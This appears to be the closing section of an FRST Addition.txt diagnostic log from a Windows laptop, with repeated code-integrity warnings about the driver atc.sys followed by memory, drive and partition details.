Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:35:34.802
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:28:40.259
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 17:56:09.418
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:33:10.017
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:28:30.614
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 21%
Total physical RAM: 6035.48 MB
Available physical RAM: 4739.77 MB
Total Virtual: 6995.48 MB
Available Virtual: 5796.36 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:902.98 GB) (Free:594.78 GB) NTFS

\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)

Partition: GPT.

==================== End of Addition.txt ============================